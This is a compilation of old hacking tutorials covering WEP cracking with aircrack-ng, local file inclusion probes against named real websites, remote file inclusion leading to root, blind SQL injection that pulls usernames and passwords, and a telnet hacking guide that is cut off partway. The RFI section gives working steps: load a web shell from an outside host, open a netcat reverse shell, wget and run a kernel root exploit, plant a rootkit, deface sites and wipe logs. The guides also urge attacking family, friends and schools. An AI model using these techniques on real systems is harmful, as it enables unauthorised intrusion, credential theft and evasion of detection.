Rooting a Windows Machine : Rooting ?

What is rooting? Many ask this question, it can be explained simply, The hacking you see in those bad "H@cker" flicks. "Yo, DeepSeven, Im inside the FBI's Super-mega-Secret Mainframe,Yeah", "OK 0Nine, Crack the GRAPLAP encryption with a reverse hybrid mega crack." Yeah stuff like that, Breaking directly into another Computer.Heres some terms to understand me and my tutorials better,

Some Terms I use but not nessasaily other people

Foo-Total mastery of a Subject; A Fucking Fly Hack; Note not even I have performed a root-attack worthy of "Foo". Like Better then "Deep Magic"

Blue Moon - An Easy Hack, Someone with no firewall and or filesharing enabled

Red Moon - An almost impossible hack, a hack with almost no known Vulnerabilities

Terminology Everyone Uses -

Vuln/Exploit -A Coding error which allows remote access

Service - A non-temporal running program which may open sockets to the internet etc.

Rootkit - A Almost-indetectable Backdoor

Things to Keep in Mind before rooting -
1. ALL Systems connected to the internet can be rooted

2. Rooting is Difficult

3.Rooting Can be Fun

4.Though most of the time it sucks

5.There is always a Hacker who can school you

6. Advanced Rooting NEEDS knowledge of C and if you like C++

7. Other languages are helpful too

8. Rooting can be very difficult to understand.

Systems You COULD probably Root

-Your School
-Your Local Government
-Yourself
-Your Mom
-Any Computer run by a retard

Systems you probably COULD NOT root

-The Pentagon
-The CIA
-Yahoo.com
-Google.com
-Any Computer which is not connected to the internet

Thats a nominal intro to the world of Rooting

WiFi Hacking

Clientless WEP Cracking
Before Starting, Ensure:

Your hardware supports packet injection. You can verify this by using Wireshark.

You are within range of an ap. Just because you can see packets transmitted from the ap, doesn't mean you can send them to the ap if the distance is too great. Usually card strength is less than that of the transmit power of an ap.

The ap is transmitting.

The ap is using WEP with Open Authentication. If SKA(Shared Key Authentication) is being used, you must have captured the PRGA xor data previously.

You are using v0.8 of aircrack-ng. Other versions may need different command variations.

Equipment used:
MAC of card doing the injecting: 00:11:22:33:44
BSSID (AP's MAC): 13:13:13:13:13
ESSID (Wireless network name): TEST
Access point channel: 9
Wireless interface: rausb0

Solution Overview

Here are the basic steps we will be going through:
1 - Start wireless interface on monitor mode on correct channel
2 - Fake authenticate using aireplay-ng with the -1 option
3 - Initiate a fragmention attack to obtain a PRGA
4 - Use packetforge-ng to make an arp packet using the PRGA previously obtained
5 - Use airodump-ng to capture IVs
6 - Inject the arp packet created by packetforge-ng in step 4
7 - Run aircrack-ng/ptw to crack WEP key

Step 1 - Start the wireless interface in monitor mode on AP channel

Enter the following command to start the wireless card on channel 9 in monitor mode:
airmon-ng start wifi0 9

http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels -Use this page if you want to convert the frequency to channel number.

Troubleshooting Tips:

If another interface started other then rausb0 then you can use that one or use “airomon-ng stop athX” where X is each interface you want to stop.

Step 2 - Use aireplay-ng to do a fake authentication with the access point

An ap will not accept a packet from a MAC that is not associated with it. If the source MAC address you are injecting is not associated, the AP ignores the packet and sends out a “DeAuthentication” packet. No new IVs are created in this situation as the AP is ignoring any packets with the unassociated MAC in them.

Use aireplay-ng to fake authenticate to an AP.
aireplay-ng -1 0 -e TEST -a 13:13:13:13:13 -h 00:11:22:33:44 eth1

Where:
-1 means fake authentication
0 reassociation timing in seconds
-e TEST is the wireless network name
-a 13:13:13:13:13 is the access point MAC address
-h 00:11:22:33:44 is our card MAC addresss
rausb0 is the wireless interface name
Success looks like:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

Or another variation for picky access points:
aireplay-ng -1 6000 -o 1 -q 10 -e TEST -a 13:13:13:13:13 -h 00:11:22:33:44 eth1

Where:
6000 - Reauthenticate very 6000 seconds. The long period also causes keep alive packets to be sent.
-o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 - Send keep alive packets every 10 seconds.
Success:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful :-)
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
# and so on.
Failed authentication:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request

Do NOT proceed beyond this step if fake authentication is not working.

Troubleshooting Tips:
Some APs implement MAC filtering. In this case, it is necessary to know one of the MACs of any computers that use the target Access Point. Use macchanger to spoof MACs.

Step 3 - Use aireplay-ng chopchop or fragmenation attack to obtain PRGA

The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random genration algorithm) bit file. It is not the WEP key itself, nor can it decrypt packets. However, it is used to create new packets. You can use chopchop or fragmention attacks to obtain a PRGA. When one attack doesn't work against an AP, use the other one. Visit aircrack-ng.org to see the pros and cons of each attack.

Fragmentation attack:
aireplay-ng -5 -b 13:13:13:13:13 -h 00:11:22:33:44 rausb0
Where:
-5 means the fragmentation attack
-b 13:13:13:13:13 is the access point MAC address
-h 00:11:22:33:44 is the MAC address of our card and must match the MAC used in the fake authentication
rausb0 is the wireless interface name
The system will respond:
aireplay-ng -5 -b 13:13:13:13:13 -h 00:11:22:33:44 rausb0
Waiting for a data packet...
Read 127 packets...

Size: 114, FromDS: 1, ToDS: 0 (WEP)

BSSID = 13:13:13:13:13
Dest. MAC = 01:00:5E:00:00:FB
Source MAC = 00:40:F4:77:E5:C9

0x0000: 0842 0000 0100 5e00 00fb 0014 6c7e 4080 .B....^.....l~@.
0x0010: 0040 f477 e5c9 6052 8c00 0000 3073 d265 .@.w..`R....0s.e
0x0020: c402 790b 2293 c7d5 89c5 4136 7283 29df ..y.".....A6r.).
0x0030: 4e9e 5e13 5f43 4ff5 1b37 3ff9 4da4 c03b N.^._CO..7?.M..;
0x0040: 8244 5882 d5cc 7a1f 2b9b 3ef0 ee0f 4fb5 .DX...z.+.>...O.
0x0050: 4563 906d 0d90 88c4 5532 a602 a8ea f8e2 Ec.m....U2......
0x0060: c531 e214 2b28 fc19 b9a8 226d 9c71 6ab1 .1..+(...."m.qj.
0x0070: 9c9f ..

Use this packet ? y
When a packet from the access point arrives, enter “y” to proceed. You may need to try a few to be successful.
When successful, the system reponds:
Saving chosen packet in replay_src-0203-180328.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0203-180343.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Success! The file “fragment-0203-180343.xor” can then be used in the next step to generate an arp packet.
Troubleshooting Tips
Sometimes the first packet won't work. Try a few more. This goes for both attacks. Visit aircrack-ng.org for more information on the chopchop attack.

Step 4 - Use packetforge-ng to create an arp packet

Use the PRGA from the last step. Look for the file ending in "xor". Packetforge-ng uses this PRGA to make an arp packet. Hopefully, when injected, the ap will rebroadcast it and a new IV can be obtained.
packetforge-ng -0 -a 13:13:13:13:13 -h 00:11:22:33:44 -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-0203-180343.xor -w arp-request
Where:
-0 means generate an arp packet
-a 13:13:13:13:13 is the access point MAC address
-h 00:11:22:33:44 is MAC address of our card
-k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255)
-l 255.255.255.255.255 is the source IP (most APs respond to 255.255.255.255)
-y fragment-0203-180343.xor is file to read the PRGA from
-w arp-request is name of file to write the arp packet to
The system will respond:
Wrote packet to: arp-request

Step 5 - Start airodump-ng

Open another console session to capture the generated IVs. Then enter:
airodump-ng -c 9 --bssid 13:13:13:13:13 --ivs -w capture rausb0
Where:
-c 9 is the channel for the wireless network
- -bssid 13:13:13:13:13 is the access point MAC address. This eliminate extraneous traffic.
- -ivs specfifies that you only want to capture the IVs. This keeps the file as small as possible. (Do not use --ivs if you wish to crack using aircrack-ptw)
-w capture is file name prefix for the file which will contain the IVs.
rausb0 is the interface name.

Step 6 - Inject the arp packet

Using the console session where you generated the arp packet, enter:
aireplay-ng -2 -r arp-request rausb0
Where:
-2 means use interactive frame selection
-r arp-request defines the file name from which to read the arp packet
rausb0 defines the interface to use
The system will respond:
Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 13:13:13:13:13
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:09:5B:EC:EE:F2

0x0000: 0841 0201 0014 6c7e 4080 0009 5bec eef2 .A....l~@...[...
0x0010: ffff ffff ffff 8001 8f00 0000 7af3 8be4 ............z...
0x0020: c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ...........q.Z8.
0x0030: f286 fdb3 55ee 113e da14 fb19 17cc 0b5e ....U..>.......^
0x0040: 6ada 92f2 j...

Use this packet ? y
Enter “y” to use this packet. The system responds by showing how many packets it is injecting and reminds you to start airodumump if it has not already been started:
Saving chosen packet in replay_src-0204-104917.cap
You should also start airodump-ng to capture replies.

End of file.

While this command is successfully running, the airodump-ng screen will look similar to:
CH 9 ][ Elapsed: 16 s ][ 2007-02-04 11:04

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

13:13:13:13:13 47 100 179 2689 336 9 11 WEP WEP TEST

BSSID STATION PWR Lost Packets Probes

13:13:13:13:13 00:11:22:33:44 29 0 2707
Notice that the station packets are roughly equal to the BSSID data packets. This indicates injection is working well. The data rate of 336 packets per second is an indicator that the injection is working well.

Step 7 - Run aircrack-ng to obtain the WEP key

Start another console session and enter:
aircrack-ng *.ivs -b 13:13:13:13:13
Where:
*.ivs selects all files ending in “ivs”.
-b 13:13:13:13:13 selects the one access point we are interested in

You can run this while generating packets. Before long, the WEP key will be calculated displayed. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128bit keys. These are approximations. You may need more or less.

Troubleshooting Tips:
Sometimes you need to try various techniques to crack the WEP key. Try “-n” to set various key lengths. Use “-f” and try various fudge factors. Use “-k” and try disabling various korek methods.
(For Aircrack-ptw) enter:
aircrack-ng -z *.cap -b 13:13:13:13:13*
*Aircrack-ptw is specified by using the "z" switch to the aircrack-ng command. Also, ptw can only used .cap files.
Aircrack-ptw uses a different algorithm and cracks keys with a fraction of the data necessary. I've cracked 128 bit WEP with only 25k ivs.

Alternate Solution:
Here is a way that basically takes any packet broadcasted by the access point and converts it to a broadcast packet so that the AP generates a new IV.

The con to this technique is that if you receive a 1000 byte packet you then rebroadcast 1000 bytes. This can slow down the packet/sec rate substantially. The pro to this is that this process is simple. If you're lucky, you will get a small packet for rebroadcasting. With a small packet, this solution is comparable to the aforementioned process.

As always, fake authenticate first.
Enter the following command:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 13:13:13:13:13 -h 00:11:22:33:44 rausb0
Where:
-2 means use interactive frame selection
-p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client.
c FF:FF:FF:FF:FF:FF sets the destination MAC address to be a broadcast. This is required to cause the AP to replay the packet and thus getting the new IV.
-b 13:13:13:13:13 is the access point MAC address
-h 00:11:22:33:44 is the MAC address of our card and must match the MAC used in the fake authentication
rausb0 defines the interface to use
The system will respond:
Read 698 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = 13:13:13:13:13
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:D0:CF:03:34:8C

0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c a0f4 2000 0000 e233 962a ....4... ....3.*
0x0020: 90b5 fe67 41e0 9dd5 7271 b8ed ed23 8eda ...gA...rq...#..
0x0030: ef55 d7b0 a56f bc16 355f 8986 a7ab d495 .U...o..5_......
0x0040: 1daa a308 6a70 4465 9fa6 5467 d588 c10c ....jpDe..Tg....
0x0050: f043 09f6 5418 .C..T.

Use this packet ? y
You enter “y” to select the packet and start injecting it. Remember, the smaller the packet, the better. You then start injecting:
Saving chosen packet in replay_src-0411-145110.cap

Sent 10204 packets...(455 pps)

If you have not already started airodump-ng, be sure to start it now. Once you have sufficient IVs, you can start aircrack-ng and attempt to crack the WEP key.

Another variation of this attack is to use packets from a previous capture. You must have captured the full packets, not just the IVs.
Here is what the command would look like:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 13:13:13:13:13 -h 00:11:22:33:44 -r capture-01.cap rausb0
Where " -r capture-01.cap” is data from a previous capture.

Local File Inclusion - LFI

[- How to Find LFI Vulnerability -]

How to Find LFI Vulnerability, Well i use me of adding ..
Example

www.site.com/index.php?p=..





Real World Examples:

http://www.jedit.org/index.php?page=..




Warning: main(...html): failed to open stream: No such file or directory in /home/groups/j/je/jedit/htdocs/index.php on line
63

Warning: main(): Failed opening '...html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.
php on line 63




This is not Vulnerable,
A Vulnerable should look like

Warning: include() [function.include]: Failed opening '...php' for inclusion (include_path='.:/usr/share/pear') in /
home/shiner/shiner.com/htdocs/beers/beers-home.php on line 62




include is the code , the script is using for example



$page = $_GET[page];
include($page);
?>




Should be [function.include]
but


$page = $_GET[page];
require_once($page);
?>




should be [function.require_once] or [function.require]

[- Find Example (Real) -]

http://www.crew4sea.com/indexm.php?url=..




Gives us.

Fatal error: require_once() [function.require]: Failed opening required './..' (include_path='.:/:/usr/php/pear'
) in /indexm.php on line 164




[b][function.require][/b]




So we know it Vulnerable

if Windows OS, you can just do

http://www.crew4sea.com/indexm.php?url=indexm.php





other try
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://www.crew4sea.com/indexm.php?url=../etc/passwd
http://www.crew4sea.com/indexm.php?url=../etc/passwd

until you get Something.

R.F.I. Rooting

You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to give a very general picture in process of Rooting
in Linux Server with Safe Mod: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

e can run shell exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site. (www.mysite.com in the folder: shells)

After we enter in shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname - a in Command line.

To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder

In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:

We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat respond: listening on [any] 11457 ...

In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if
we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to  port 11457 ...

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: www.packetstormsecurity.org | www.arblan.com
or try Googlin' you can find 'em all ;-)

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:

wget http://www.arblan.com/localroot/h00lyshit.c

where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit
before the compile)

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit 

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

-

C9* R0ME0...

Blind SQL Injection

Blind injection is a little more complicated the classic injection but it can be done :D

I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it :D

Let's start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2 <--- this is false

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select don't work then we use subselect

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend :)

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)


4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

cause that makes you better SQL INJECTOR :D



Hope you learned something from this paper.


Have FUN! (:

C9* R0ME0.......

Telnet Hacking

1. Introduction
2. Warnings
3. Copyright Information
4. Disclaimer
5. Who Am I?
6. Shout Outs

Chapter Two: Before We Start

1. What The Hell Is Telnet?
2. What Was The Original Purpose?
3. What Can I Do With It?
4. Is It Illegal?
5. Will I Go To Jail?
6. Is It Fun?


Chapter Three: Getting Started

1. Possible Targets
2. Is The Target Alive?
3. Scanning For Ports
4. Getting An IP
4.A. Messenger
4.B. Social Engineering It
4.C. Your Firewall

Chapter Four: Connecting

1. Connecting To An IP


Chapter Five: What To Do After Your Connected

1. Doing Something!
2. FTP

Chapter Six: Cracking A Pass

1. Brutus
2. Password Lists
3. Default Passwords


Chapter Seven: FAQ's

1. 'I Get A Blank Screen After Connecting!'
2. 'It Says It Can't Connect! WTF!'
3. 'My Computer Flips Off After Connecting!'
4. 'Where Do I Type My Commands?'
5. 'I Got Arrested!!! Can I Sue You?'


Chapter Eight: Wrapping Up

1. Contact Me
2. TGS



~`CHAPTER ONE: INTRODUCTION`~


~`Introduction`~

Hey. I decided that my old telnet tutorial was not sufficient, so I
decided to redo it, among all the other work I have to do. This will
provide a step by step method to: Connect to an IP, Connect to a
certain port, Decide if the port is responsive, Find commands that you
can use on this 'Box', Use the commands, Crack a password using
'Brutus', Find Targets, and many other things. It will also include
many pictures that you can use as a reference. Remember, all command
prompts are different, don't be discouraged.


~`Warnings`~

This is a form of hacking. Whether you do or do not damage a computer,
you are committing a felony. Connecting to a computer or something of
the kind without permission is punishable by law and will get you corn
holed in a state prison by a 365 pound, one eared black man by the
name of bubba. You can be held to Criminal, as well as Civil suites
for your actions.

Doing this is a good way to get enemies' also. Remember, there are
hundreds of hacking groups out there, and hundreds of hackers, there's
a chance that you can be fucking with a hacker of a group, and that is
not a fun thing to do.



~`Copyright Information`~

This or any portion of this paper is allowed to be duplicated. You may
host it on your site, as long as it stays intact. Failure to comply
with this will result in swift legal action.



~`Disclaimer`~

I cannot be held responsible for your actions because of this. I will
not take responsibility. If you don't agree with this, DO NOT READ
FURTHER. I do not condone hacking, as well as any other form of
illegal behavior. Also, you will encounter a number of IP's in this
forum, DO NOT USE ANY OF THEM. The ones I used for demonstration I did
not hurt, and I take no responsibility if you do use them. You have
been warned.

NOTE: I used www.sjms.org (the website of a fine military academy) in
some of my examples. I mean no harm to come to www.sjms.org. I did not
hack www.sjms.org, and I don't recommend you doing it either. I take
no responsibility if you do though.



~`Who Am I?`~

I am Errorised of the www.waushare.com forums. If you'd like to get a hold of me, do
so at koft@habbocommunity.co.uk



~`Shout Outs`~

Hey I'd like to say hello to my good buddies: Wau / Placi / Maki / Unstable /
Phantom / BOOSTER / Chaos Zero / T1M3 / M4K3 / RedFox / Mr.Wolves / h3r3t1c
and whoever else I forgot (due to the pot) These are all buddies, as
well as PSP-Hacks members.



~`CHAPTER TWO: BEFORE WE START`~


~`What Was The Original Purpose Of Telnet?`~

Telnet was originally made for someone to do all sorts of things. From
checking your mail to connecting to your company's server while on a
business trip, telnet does it all. The makers of

it had a dream in mind that the average person could deal with
command/text based programs. But of course when the masses got into it
and every brother and sister bought a computer,

Windows was made, which totally destroyed most text based programs.
Now fucking idiots run computers and company's with computers, and
can't even deal with a damn telnet program!


~`What Can I Do With It?`~

Although Telnet has died for the business men, it is still growing
quickly with the not-so-trustful person. For the hacker, Telnet is the
hammer in the tool box. Telnet is one of the most

world wide programs among hackers, as well as other fun loving people.
When you finally hit that golden hack after your first long hours of
struggling with telnet (not!), you are god!

You can change other people's passwords, snoop on e-mails, forge dirty
e-mails to ones lover,


~`Is It Illegal?`~

Two words: HELL YES. Hacking is the most illegal thing one can do on
the internet. Do not be mistaken, it's quite illegal.



~`Will I Go To Jail?`~

Only if you're caught. This is why it's good to encrypt your entire
hard rive, if they can't get anywhere in your hard rive, how the hell
are they going to charge you with anything? It is very good to be
paranoid. My computer is a vault. The military runs 1800 bit
encryption tops. The average bit encryption for any given file in my
computer is around 7000, Triple Blowfish encrypted. There's also a
shredder that hides in the startup registry that I made in a batch
file, it hides there and if you don't turn it off within 15 seconds of
starting up, bye bye computer and bye bye evidence. It's always good
to be paranoid.


~`Is It Fun?`~

Despite my comments about jail, it is quite fun. Most hackers do what
they do for the simple thrill of knowing secrets that no ones supposed
to know. Having inside information on people

who they barely know or care about. Knowing top secret information
that only god and the president are supposed to know, now that's fun!



~`CHAPTER THREE: GETTING STARTED`~


~`Possible Targets`~

A target is a person, place, or thing (kind of like a noun, eh?) in
which you are planning on attacking. A target can be anyone! Common
targets include: Family, Friends, Government, Phone

Company's, and Former Attackers. Normally the first target is a friend
or family member, someone who's not so smart and someone you know for
a fact has no security. Security just gets in the way. '7337' hackers
learn to deal with security, newbie's fall into the trap. So for now
stick with someone easy.


~`Is The Target Alive?`~

Go to command prompt (or Ms-DOS) and type ping 0.0.0.0. (replacing the
zeros for the real IP). If it returns, then the computer is connected
to the internet. If it says that its lost, then the computer offline
(duh!).



~`Scanning For Ports`~

We will be using Blues Port Scanner to scan for ports. You can get
blues port scanner at download.com or www.library.2ya.com. It is about
400 KB, not too big.
You scan an IP for ports by pasting (CTRL V) the IP in both boxes in
the top. This makes it scan only that ip. You then put the selected
range of ports in which you wish to scan.

The more you scan, the more of a chance they will notice your
movements, but do as you please.





~`Getting An IP`~

IP is short for Internet Protocol. Each computer has an IP. Getting
someones IP can be as easy as asking for it. Here's a few ways:

Messenger:

Ok, so you have MSN messenger. Your a 'bad mofo', a 'rough rider', now
its time to get what you need from your victim. The first thing to do
is build trust. It would be wise to do this on someone you know will
trust you enough to buy into your shit. Here's how you get their IP:

1. Send them a file through MSN (or whatever they have). It can be
anything, a game, a dead hamster, a naked picture of yourself,
whatever.

2. Once they accept, go into Command Prompt and type "netstat".

3. With a bit of hunting and picking you should be able to find their
IP in the box.




Social Engineering:

Social Engineering is a fancy term that people use to discribe smooth
talkers. Social Engineerers are slick, smooth, smart, and know what
their talking about. They get into the part before

attacking, they have great social skills and are easy people to trust.
Social Engineerers build up a nice level of trust, the more the
better, until they get the information they want.
Once, on a SC 'field trip' with a friend of mine, we actually got
dressed up to walk to a payphone and make the attack that we've been
building trust for months. It was worth it.

But anyway, back to the subject.

Usually, all you need to do is ask the person. If they know better
then to give you the IP if you flat out ask them, then they will know
better then if you try to scare it out of them. Get em to go to
ipchicken.com and give you the numbers in the blue letters.


Your Firewall:

If you have a firewall, then chances are you've seen someone trying to
scan you for open ports. If you use Black ICE, all the better. I
suggest you download it at www.library.2ya.com.

What Black ICE does is gather up all the attempts to port probe you,
connect to your computer, or anything else, and stick it in a database
for further use. You can easily pick out targets from the list and use
them for your will.

Double click on the person you wish to get the ip with, and on the
right it gives you the IP AND the DNS! How nice eh?


~`CHAPTER FOUR: CONNECTING`~


~`Connecting To An IP`~


Ok, so you've got your list of open ports on the computer. For this
demonstration I'll be using someone who attempted to hack me a while
back. After scanning a few thousand ports, we come up with this list.
Now not all of these allow connections. The ones labeled with a red
box next to them are 'dead' ports for the telnet program. This is
usually because they only communicate using a certain 'language' that
Telnet doesn't support. When you try to connect to these you get a
blank screen with dashs where you try to type (see below). The
listings labeled with a green next to them allow connections and will
talk to you without having to give it a user or pass. The ones labeled
with a blue box next to them means that they are responsive, are not
dead, but they require authentication before your allowed to connect.
If you really need into this computer and they've got password
protected ports, there's a section later in the paper that tells you
how to get in. So anyway, lets focus on the responsive port. This is
unfortunately the SMTP port (Simple Mail Transfer Protocol). Although
it does not allow a significate amount of access to this persons
computer without knowing advanced things, it does give us a good basis
for a demonstration in Telneting. Below will show you step by step on
how to connect and other things with this port.




1. Connect to the computer by typing "Telnet 0.0.0.0 25" in Command
Prompt/Ms DOS. You should replace the "0.0.0.0" for the IP address you
wish to connect to, and the 25 for the specific port you plan on
connecting to. For this demonstration, I will be using the IP
161.58.163.4 and the port 25. So the command should read "telnet
161.58.163.4 25". There's no special place to type (as I've received
many e-mails questioning this), when you type, it should show up at
